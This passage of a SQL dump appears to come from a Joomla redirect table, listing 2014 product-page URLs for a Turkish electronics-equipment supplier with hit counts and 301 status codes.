09:58:30','0000-00-00 00:00:00',301),(3567,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116&Itemid=127&lang=en','','','',3,0,'2014-08-18 09:59:47','0000-00-00 00:00:00',301),(3568,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=93&Itemid=104','','','',2,0,'2014-08-18 10:00:37','0000-00-00 00:00:00',301),(3569,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39&Itemid=57','','','',1,0,'2014-08-18 10:01:31','0000-00-00 00:00:00',301),(3570,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=163','','','',3,0,'2014-08-18 10:02:38','0000-00-00 00:00:00',301),(3571,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121&Itemid=115','','','',2,0,'2014-08-18 10:03:02','0000-00-00 00:00:00',301),(3572,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57&Itemid=145','','','',1,0,'2014-08-18 10:03:25','0000-00-00 00:00:00',301),(3573,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=148&lang=tr','','','',2,0,'2014-08-18 10:04:11','0000-00-00 00:00:00',301),(3574,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=128&lang=en','','','',5,0,'2014-08-18 10:04:34','0000-00-00 00:00:00',301),(3575,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87:temizlik&catid=40:temizleme&Itemid=103&lang=tr','','','',11,0,'2014-08-18 10:05:19','0000-00-00 00:00:00',301),(3576,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=83:neomark&catid=51:neo&Itemid=95&lang=tr','','','',10,0,'2014-08-18 10:05:41','0000-00-00 00:00:00',301),(3577,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=124&lang=tr','','','',8,0,'2014-08-18 10:06:02','0000-00-00 00:00:00',301),(3578,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41&Itemid=55','','','',1,0,'2014-08-18 10:06:45','0000-00-00 00:00:00',301),(3579,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44&Itemid=56','','','',1,0,'2014-08-18 10:07:07','0000-00-00 00:00:00',301),(3580,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=101','','','',2,0,'2014-08-18 10:07:48','0000-00-00 00:00:00',301),(3581,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117&Itemid=128&lang=en','','','',6,0,'2014-08-18 10:08:10','0000-00-00 00:00:00',301),(3582,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164&Itemid=160&lang=en','','','',3,0,'2014-08-18 10:09:32','0000-00-00 00:00:00',301),(3583,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42:th-dizgi&Itemid=27&layout=default&lang=en','','','',3,0,'2014-08-18 10:10:48','0000-00-00 00:00:00',301),(3584,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156','','','',4,0,'2014-08-18 10:12:22','0000-00-00 00:00:00',301),(3585,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=164&lang=tr','','','',12,0,'2014-08-18 10:12:58','0000-00-00 00:00:00',301),(3586,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=101&lang=en','','','',9,0,'2014-08-18 10:13:34','0000-00-00 00:00:00',301),(3587,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147&Itemid=146','','','',1,0,'2014-08-18 10:13:51','0000-00-00 00:00:00',301),(3588,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=95&Itemid=106','','','',4,0,'2014-08-18 10:14:09','0000-00-00 00:00:00',301),(3589,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107:yuksek-guclu-flux-giderici-frc&catid=40:temizleme&Itemid=118&lang=tr','','','',4,0,'2014-08-18 10:15:17','0000-00-00 00:00:00',301),(3590,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=85:neocut&catid=51:neo&Itemid=97&lang=tr','','','',2,0,'2014-08-18 10:16:38','0000-00-00 00:00:00',301),(3591,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=99&Itemid=43','','','',3,0,'2014-08-18 10:17:42','0000-00-00 00:00:00',301),(3592,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=152&lang=en','','','',5,0,'2014-08-18 10:17:56','0000-00-00 00:00:00',301),(3593,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=160&lang=tr','','','',2,0,'2014-08-18 10:18:11','0000-00-00 00:00:00',301),(3594,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122','','','',2,0,'2014-08-18 10:18:26','0000-00-00 00:00:00',301),(3595,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=161&lang=en','','','',6,0,'2014-08-18 10:19:39','0000-00-00 00:00:00',301),(3596,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150&lang=en','','','',10,0,'2014-08-18 10:19:53','0000-00-00 00:00:00',301),(3597,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=165:microcare&catid=1:son-haberler&Itemid=28&lang=tr','','','',10,0,'2014-08-18 10:20:35','0000-00-00 00:00:00',301),(3598,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=95&Itemid=106&lang=en','','','',4,0,'2014-08-18 10:21:03','0000-00-00 00:00:00',301),(3599,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155&Itemid=81&lang=tr','','','',1,0,'2014-08-18 10:21:29','0000-00-00 00:00:00',301),(3600,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=101&lang=en','','','',2,0,'2014-08-18 10:22:33','0000-00-00 00:00:00',301),(3601,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=47:aoi&Itemid=1&layout=default&lang=en','','','',6,0,'2014-08-18 10:22:46','0000-00-00 00:00:00',301),(3602,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107&Itemid=118&lang=tr','','','',2,0,'2014-08-18 10:23:23','0000-00-00 00:00:00',301),(3603,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=165:microcare&catid=1:son-haberler&Itemid=28&lang=tr','','','',4,0,'2014-08-18 10:23:47','0000-00-00 00:00:00',301),(3604,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43:ultra-hizli&Itemid=2&layout=default&lang=en','','','',2,0,'2014-08-18 10:24:22','0000-00-00 00:00:00',301),(3605,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=141&lang=en','','','',5,0,'2014-08-18 10:24:46','0000-00-00 00:00:00',301),(3606,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160&Itemid=161&lang=en','','','',2,0,'2014-08-18 10:24:57','0000-00-00 00:00:00',301),(3607,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166&Itemid=144&lang=tr','','','',1,0,'2014-08-18 10:27:28','0000-00-00 00:00:00',301),(3608,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107&Itemid=118&lang=tr','','','',1,0,'2014-08-18 10:27:47','0000-00-00 00:00:00',301),(3609,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=127&lang=en','','','',7,0,'2014-08-18 10:27:57','0000-00-00 00:00:00',301),(3610,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42&Itemid=27&lang=en','','','',2,0,'2014-08-18 10:28:17','0000-00-00 00:00:00',301),(3611,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=117&lang=tr','','','',6,0,'2014-08-18 10:29:59','0000-00-00 00:00:00',301),(3612,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59:bolgesel-lehimleme-mak&Itemid=155&layout=default&lang=en','','','',2,0,'2014-08-18 10:30:25','0000-00-00 00:00:00',301),(3613,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=143&lang=tr','','','',3,0,'2014-08-18 10:31:39','0000-00-00 00:00:00',301),(3614,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154&Itemid=156&lang=en','','','',3,0,'2014-08-18 10:32:04','0000-00-00 00:00:00',301),(3615,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145&Itemid=147','','','',2,0,'2014-08-18 10:34:09','0000-00-00 00:00:00',301),(3616,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=120&lang=tr','','','',13,0,'2014-08-18 10:34:59','0000-00-00 00:00:00',301),(3617,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default','','','',6,0,'2014-08-18 10:37:29','0000-00-00 00:00:00',301),(3618,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=164&lang=tr','','','',11,0,'2014-08-18 10:39:39','0000-00-00 00:00:00',301),(3619,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126:e-katalog&catid=55:katalog&Itemid=133&lang=en','','','',3,0,'2014-08-18 10:40:24','0000-00-00 00:00:00',301),(3620,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116&Itemid=127','','','',2,0,'2014-08-18 10:42:04','0000-00-00 00:00:00',301),(3621,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59:bolgesel-lehimleme-mak&Itemid=155&layout=default&lang=tr','','','',2,0,'2014-08-18 10:42:54','0000-00-00 00:00:00',301),(3622,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55&Itemid=1&lang=en','','','',1,0,'2014-08-18 10:43:19','0000-00-00 00:00:00',301),(3623,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140:sharpshooter&catid=56:rework-stasyonlari&Itemid=142&lang=tr','','','',9,0,'2014-08-18 10:43:44','0000-00-00 00:00:00',301),(3624,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140&Itemid=142','','','',2,0,'2014-08-18 10:44:36','0000-00-00 00:00:00',301),(3625,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=84:neoplace&catid=51:neo&Itemid=96&lang=en','','','',9,0,'2014-08-18 10:44:59','0000-00-00 00:00:00',301),(3626,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=165:microcare&catid=1:son-haberler&Itemid=28&lang=en','','','',1,0,'2014-08-18 10:45:49','0000-00-00 00:00:00',301),(3627,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156:lf-350b&catid=44:pota&Itemid=157&lang=en','','','',4,0,'2014-08-18 10:47:04','0000-00-00 00:00:00',301),(3628,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111&Itemid=122','','','',2,0,'2014-08-18 10:47:29','0000-00-00 00:00:00',301),(3629,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=122&Itemid=129&lang=en','','','',3,0,'2014-08-18 10:47:54','0000-00-00 00:00:00',301),(3630,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=165:microcare&catid=1:son-haberler&Itemid=28','','','',1,0,'2014-08-18 10:51:14','0000-00-00 00:00:00',301),(3631,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=164&lang=en','','','',7,0,'2014-08-18 10:51:39','0000-00-00 00:00:00',301),(3632,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126&Itemid=133','','','',2,0,'2014-08-18 10:53:19','0000-00-00 00:00:00',301),(3633,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137&Itemid=139&lang=tr','','','',4,0,'2014-08-18 10:54:37','0000-00-00 00:00:00',301),(3634,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=83:neomark&catid=51:neo&Itemid=95&lang=tr','','','',7,0,'2014-08-18 10:55:24','0000-00-00 00:00:00',301),(3635,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=98&Itemid=109&lang=tr','','','',1,0,'2014-08-18 10:56:14','0000-00-00 00:00:00',301),(3636,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55:katalog&Itemid=1&layout=default&lang=en','','','',6,0,'2014-08-18 10:56:39','0000-00-00 00:00:00',301),(3637,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43:ultra-hizli&Itemid=2&layout=default&lang=tr','','','',4,0,'2014-08-18 10:57:04','0000-00-00 00:00:00',301),(3638,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54:pcb-ve-stensil-temizleme-makineleri&Itemid=114&layout=default','','','',4,0,'2014-08-18 10:57:29','0000-00-00 00:00:00',301),(3639,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58:dusuk-hizli-smd-dizgi&Itemid=149&layout=default','','','',7,0,'2014-08-18 10:58:19','0000-00-00 00:00:00',301),(3640,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=161&lang=en','','','',4,0,'2014-08-18 10:58:24','0000-00-00 00:00:00',301),(3641,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51:neo&Itemid=92&layout=default&lang=en','','','',2,0,'2014-08-18 10:59:09','0000-00-00 00:00:00',301),(3642,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=90&Itemid=102','','','',3,0,'2014-08-18 10:59:34','0000-00-00 00:00:00',301),(3643,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=82','','','',7,0,'2014-08-18 11:01:16','0000-00-00 00:00:00',301),(3644,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51:neo&Itemid=92&layout=default&lang=en','','','',1,0,'2014-08-18 11:01:19','0000-00-00 00:00:00',301),(3645,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=148&lang=en','','','',6,0,'2014-08-18 11:01:39','0000-00-00 00:00:00',301),(3646,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=117&lang=tr','','','',5,0,'2014-08-18 11:02:50','0000-00-00 00:00:00',301),(3647,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159&Itemid=162','','','',8,0,'2014-08-18 11:03:44','0000-00-00 00:00:00',301),(3648,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=119&lang=tr','','','',10,0,'2014-08-18 11:04:34','0000-00-00 00:00:00',301),(3649,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=98&Itemid=109&lang=tr','','','',1,0,'2014-08-18 11:05:24','0000-00-00 00:00:00',301),(3650,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=164&lang=tr','','','',4,0,'2014-08-18 11:05:37','0000-00-00 00:00:00',301),(3651,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41:smd-firin&Itemid=55&layout=default','','','',6,0,'2014-08-18 11:05:53','0000-00-00 00:00:00',301),(3652,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60:ikinciel&Itemid=164&layout=default&lang=tr','','','',4,0,'2014-08-18 11:06:39','0000-00-00 00:00:00',301),(3653,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137&Itemid=139&lang=en','','','',2,0,'2014-08-18 11:07:04','0000-00-00 00:00:00',301),(3654,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42&Itemid=27','','','',2,0,'2014-08-18 11:07:55','0000-00-00 00:00:00',301),(3655,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=115&lang=en','','','',3,0,'2014-08-18 11:08:20','0000-00-00 00:00:00',301),(3656,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=86:mx350&catid=36:orta-hizli&Itemid=98&lang=en','','','',8,0,'2014-08-18 11:09:34','0000-00-00 00:00:00',301),(3657,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=147&lang=en','','','',7,0,'2014-08-18 11:09:58','0000-00-00 00:00:00',301),(3658,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46&Itemid=62','','','',1,0,'2014-08-18 11:10:24','0000-00-00 00:00:00',301),(3659,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=97&Itemid=108&lang=en','','','',6,0,'2014-08-18 11:11:14','0000-00-00 00:00:00',301),(3660,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=141&lang=en','','','',5,0,'2014-08-18 11:12:04','0000-00-00 00:00:00',301),(3661,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119&Itemid=117','','','',7,0,'2014-08-18 11:13:20','0000-00-00 00:00:00',301),(3662,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162&lang=en','','','',6,0,'2014-08-18 11:15:33','0000-00-00 00:00:00',301),(3663,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57:screen-printer&Itemid=145&layout=default&lang=tr','','','',7,0,'2014-08-18 11:16:25','0000-00-00 00:00:00',301),(3664,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=152&lang=tr','','','',6,0,'2014-08-18 11:18:22','0000-00-00 00:00:00',301),(3665,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58:dusuk-hizli-smd-dizgi&Itemid=149&layout=default&lang=en','','','',4,0,'2014-08-18 11:18:44','0000-00-00 00:00:00',301),(3666,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=115&Itemid=126&lang=tr','','','',4,0,'2014-08-18 11:20:26','0000-00-00 00:00:00',301),(3667,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168:aoibilgi&catid=47:aoi&Itemid=58&lang=tr','','','',4,0,'2014-08-18 11:21:17','0000-00-00 00:00:00',301),(3668,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=98&Itemid=109','','','',5,0,'2014-08-18 11:21:38','0000-00-00 00:00:00',301),(3669,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149&Itemid=150&lang=tr','','','',3,0,'2014-08-18 11:22:03','0000-00-00 00:00:00',301),(3670,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=143&lang=tr','','','',6,0,'2014-08-18 11:22:55','0000-00-00 00:00:00',301),(3671,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=124&Itemid=130&lang=tr','','','',3,0,'2014-08-18 11:23:02','0000-00-00 00:00:00',301),(3672,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41:smd-firin&Itemid=55&layout=default&lang=tr','','','',5,0,'2014-08-18 11:23:44','0000-00-00 00:00:00',301),(3673,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60&Itemid=164&lang=en','','','',3,0,'2014-08-18 11:24:34','0000-00-00 00:00:00',301),(3674,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162','','','',4,0,'2014-08-18 11:25:00','0000-00-00 00:00:00',301),(3675,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149&Itemid=150&lang=tr','','','',1,0,'2014-08-18 11:26:18','0000-00-00 00:00:00',301),(3676,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=47&Itemid=1&lang=en','','','',1,0,'2014-08-18 11:27:04','0000-00-00 00:00:00',301),(3677,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109&Itemid=120','','','',5,0,'2014-08-18 11:27:31','0000-00-00 00:00:00',301),(3678,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=112&lang=tr','','','',7,0,'2014-08-18 11:28:45','0000-00-00 00:00:00',301),(3679,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=139','','','',2,0,'2014-08-18 11:29:08','0000-00-00 00:00:00',301),(3680,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=124&lang=tr','','','',4,0,'2014-08-18 11:29:59','0000-00-00 00:00:00',301),(3681,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=164&lang=en','','','',3,0,'2014-08-18 11:34:39','0000-00-00 00:00:00',301),(3682,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=159&lang=en','','','',3,0,'2014-08-18 11:35:23','0000-00-00 00:00:00',301),(3683,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41&Itemid=55&lang=en','','','',5,0,'2014-08-18 11:35:53','0000-00-00 00:00:00',301),(3684,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=164&lang=tr','','','',8,0,'2014-08-18 11:37:37','0000-00-00 00:00:00',301),(3685,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44:pota&Itemid=56&layout=default&lang=en','','','',2,0,'2014-08-18 11:38:14','0000-00-00 00:00:00',301),(3686,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=164&lang=en','','','',5,0,'2014-08-18 11:39:19','0000-00-00 00:00:00',301),(3687,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46:konveyorler&Itemid=62&layout=default&lang=en','','','',1,0,'2014-08-18 11:40:43','0000-00-00 00:00:00',301),(3688,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158&Itemid=159&lang=en','','','',4,0,'2014-08-18 11:41:21','0000-00-00 00:00:00',301),(3689,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=138&lang=en','','','',4,0,'2014-08-18 11:42:37','0000-00-00 00:00:00',301),(3690,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60&Itemid=164','','','',4,0,'2014-08-18 11:43:07','0000-00-00 00:00:00',301),(3691,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153&lang=en','','','',3,0,'2014-08-18 11:43:32','0000-00-00 00:00:00',301),(3692,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113&Itemid=125&lang=en','','','',1,0,'2014-08-18 11:44:46','0000-00-00 00:00:00',301),(3693,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=85:neocut&catid=51:neo&Itemid=97','','','',6,0,'2014-08-18 11:45:29','0000-00-00 00:00:00',301),(3694,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36:orta-hizli&Itemid=37&layout=default&lang=tr','','','',1,0,'2014-08-18 11:45:56','0000-00-00 00:00:00',301),(3695,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56:rework-stasyonlari&Itemid=137&layout=default&lang=tr','','','',5,0,'2014-08-18 11:46:53','0000-00-00 00:00:00',301),(3696,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51&Itemid=92&lang=en','','','',3,0,'2014-08-18 11:47:34','0000-00-00 00:00:00',301),(3697,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140:sharpshooter&catid=56:rework-stasyonlari&Itemid=142','','','',1,0,'2014-08-18 11:48:41','0000-00-00 00:00:00',301),(3698,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=97&Itemid=108&lang=tr','','','',5,0,'2014-08-18 11:48:55','0000-00-00 00:00:00',301),(3699,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164&Itemid=160&lang=en','','','',1,0,'2014-08-18 11:49:09','0000-00-00 00:00:00',301),(3700,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138&Itemid=140&lang=tr','','','',3,0,'2014-08-18 11:49:19','0000-00-00 00:00:00',301),(3701,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155&Itemid=81&lang=tr','','','',1,0,'2014-08-18 11:49:35','0000-00-00 00:00:00',301),(3702,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=84&Itemid=96&lang=en','','','',3,0,'2014-08-18 11:52:30','0000-00-00 00:00:00',301),(3703,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=127&Itemid=134&lang=en','','','',1,0,'2014-08-18 11:52:55','0000-00-00 00:00:00',301),(3704,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105&Itemid=112','','','',1,0,'2014-08-18 11:55:28','0000-00-00 00:00:00',301),(3705,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=82&Itemid=38&lang=en','','','',3,0,'2014-08-18 11:58:44','0000-00-00 